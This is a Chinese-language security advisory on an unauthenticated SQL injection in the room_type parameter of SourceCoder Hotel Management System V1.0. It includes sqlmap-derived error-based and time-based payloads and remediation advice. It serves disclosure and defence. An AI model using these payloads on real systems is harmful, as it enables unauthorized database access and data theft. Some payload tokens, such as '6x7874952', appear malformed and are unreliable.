# SourceCoder Hotel Management System SQL 注入漏洞总结 ## 漏洞概述 * **漏洞名称**:SourceCoder Hotel Management System `/index.php/reservation/check` SQL 注入 * **漏洞类型**:SQL Injection (SQL 注入) * **受影响产品**:使用 CodeIgniter 框架开发的 PHP 酒店管理系统 * **漏洞位置**:`/index.php/reservation/check` 文件 * **触发参数**:`room_type` (POST 请求) * **利用条件**:无需登录或授权即可利用 * **根本原因**:攻击者注入恶意代码到 `room_type` 参数,并在 SQL 查询中直接使用,缺乏适当的清理或验证。 ## 影响范围 * **受影响版本**:V1.0 * **危害描述**:攻击者可利用此漏洞实现未授权的数据库访问、敏感数据泄露、数据篡改、全面的系统控制,甚至导致服务中断,对系统安全和业务连续性构成严重威胁。 ## 漏洞利用代码 (POC) **Payload 1 (Error-based):** ```text Parameter: room_type (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- - Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM]) ``` **Payload 2 (Time-based blind):** ```text Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- - Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- - ``` **SQLMap 测试输出截图中的关键 Payload:** ```text POST parameter 'room_type' is vulnerable. Do you want to keep testing the others? [sqlmap] (0.6.0) used the default behavior, running in batch mode sqlmap identified the following injection point(s) with a total of 1593 HTTP(s) requests: Parameter: room_type (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7874952 WHERE 2021=2021 AND GTID_SUBSET(CONCAT(0x7171717171,0x7874952,0x7171717171),FLOOR(RAND(0)*2)))-- - Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]', [QUERY], '[DELIMITER_STOP]'), [RANDOM]) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer_TCono62314&room_type=Deluxe'||(SELECT 6x7646966 WHERE 9079=9079 AND (SELECT 2429 FROM (SELECT(SLEEP(5)))RANDSTR))-- - Vector: AND (SELECT [RANDOMNUM] FROM (SELECT(SLEEP(5)))RANDSTR))-- - ``` ## 修复方案 1. **使用预处理语句和参数绑定**:预处理语句可以防止 SQL 注入,因为它们将 SQL 代码与用户输入数据分开。当使用预处理语句时,用户输入的值被视为纯数据,不会被解释为 SQL 代码。 2. **输入验证和过滤**:严格验证和过滤用户输入数据,确保其符合预期格式。 3. **最小化数据库用户权限**:确保用于连接数据库的账户具有最小必要权限。避免使用具有高级权限(如 root 或 admin)的账户进行日常操作。 4. **定期安全审计**:定期进行代码和系统安全审计,以及时识别和修复潜在的安全漏洞。